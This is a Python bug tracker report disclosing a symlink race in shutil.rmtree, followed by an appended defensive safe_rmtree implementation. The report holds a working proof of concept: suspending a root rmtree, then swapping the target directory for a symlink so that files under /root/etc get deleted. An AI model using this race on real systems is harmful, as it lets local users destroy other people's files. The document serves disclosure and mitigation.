[issue4489] shutil.rmtree is vulnerable to a symlink attack

Mart Sõmermaa report at bugs.python.org
Tue Dec 2 16:42:02 CET 2008


New submission from Mart Sõmermaa <mrts at mrts.pri.ee>:

Race condition in the rmtree function in the shutil module allows local
users to delete arbitrary files and directories via a symlink attack.

See also http://bugs.debian.org/286922

Attack:

---

# emulate removing /etc
$ sudo cp -a /etc /root/etc/
$ sudo python2.6
>>> for i in xrange(0, 50000):
...     with open("/root/etc/" + str(i), "w") as f:
...         f.write("0")
...
$ ls /root/etc > orig_list.txt

$ mkdir /tmp/attack
$ cp -a /root/etc/* /tmp/attack

$ sudo python2.6
>>> from shutil import rmtree
>>> rmtree('/tmp/attack')
>>> # press ctrl-z to suspend execution
^Z
[1]+  Stopped                 sudo python2.6

$ mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack
$ fg
sudo python2.6
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/local/lib/python2.6/shutil.py", line 225, in rmtree
    onerror(os.rmdir, path, sys.exc_info())
  File "/usr/local/lib/python2.6/shutil.py", line 223, in rmtree
    os.rmdir(path)
OSError: [Errno 20] Not a directory: '/tmp/attack'

$ ls /root/etc > new_list.txt
$ diff -q orig_list.txt new_list.txt
Files orig_list.txt and new_list.txt differ

---

If the attack wasn't successful, /root/etc would not be modified and
orig_list.txt and new_list.txt would be identical.

----------
components: Library (Lib)
messages: 76753
nosy: mrts
severity: normal
status: open
title: shutil.rmtree is vulnerable to a symlink attack
type: security
versions: Python 2.3, Python 2.4, Python 2.5, Python 2.6, Python 3.0

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue4489>
_______________________________________
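The mitigation side of the race above, as an added example that is neither part of the report nor CPython's own code: a delete routine that walks the tree by file descriptor, opens every subdirectory with O_NOFOLLOW, and checks with fstat that the handle still refers to the inode it lstat'ed, so a directory swapped for a symlink between the two steps makes the deletion fail instead of being followed. The names safe_rmtree, _rmtree_fd and demo are assumptions, and the fixture in demo is constructed for illustration (Unix only).

```python
import os
import stat
import tempfile

def _rmtree_fd(topfd, path):
    """Delete everything inside the directory open as topfd; the caller removes topfd's directory."""
    with os.scandir(topfd) as it:
        entries = list(it)
    for entry in entries:
        full = os.path.join(path, entry.name)
        # follow_symlinks=False is an lstat: a symlink to a directory is NOT treated as a directory
        if entry.is_dir(follow_symlinks=False):
            before = entry.stat(follow_symlinks=False)
            # O_NOFOLLOW: fail instead of following a link swapped in after the lstat above
            fd = os.open(entry.name, os.O_RDONLY | os.O_NOFOLLOW | os.O_DIRECTORY, dir_fd=topfd)
            try:
                # the open handle must still be the inode we lstat'ed, else the tree was swapped under us
                if not os.path.samestat(before, os.fstat(fd)):
                    raise OSError("directory replaced during deletion: " + full)
                _rmtree_fd(fd, full)
            finally:
                os.close(fd)
            os.rmdir(entry.name, dir_fd=topfd)
        else:
            os.unlink(entry.name, dir_fd=topfd)  # files and symlinks: remove the name, never the target

def safe_rmtree(path):
    """Recursively delete path without ever following a symlink, top level included."""
    before = os.lstat(path)
    if stat.S_ISLNK(before.st_mode):
        raise OSError("refusing to delete through a symbolic link: " + path)
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_DIRECTORY)
    try:
        if not os.path.samestat(before, os.fstat(fd)):
            raise OSError("directory replaced during deletion: " + path)
        _rmtree_fd(fd, path)
    finally:
        os.close(fd)
    os.rmdir(path)

def demo():
    """Constructed fixture: a victim directory outside the tree plus a tree holding a symlink to it."""
    base = tempfile.mkdtemp()
    victim = os.path.join(base, "victim"); os.mkdir(victim)
    open(os.path.join(victim, "keep.txt"), "w").close()
    tree = os.path.join(base, "tree"); os.makedirs(os.path.join(tree, "sub"))
    open(os.path.join(tree, "sub", "junk"), "w").close()
    os.symlink(victim, os.path.join(tree, "planted"))  # the kind of link the race would plant
    safe_rmtree(tree)
    return {"tree_gone": not os.path.lexists(tree), "victim_intact": os.path.exists(os.path.join(victim, "keep.txt"))}
```

The samestat check is what closes the window the report exploits with ctrl-z: a name that was a directory at lstat time but is a symlink by open time either fails O_NOFOLLOW or no longer matches the recorded inode.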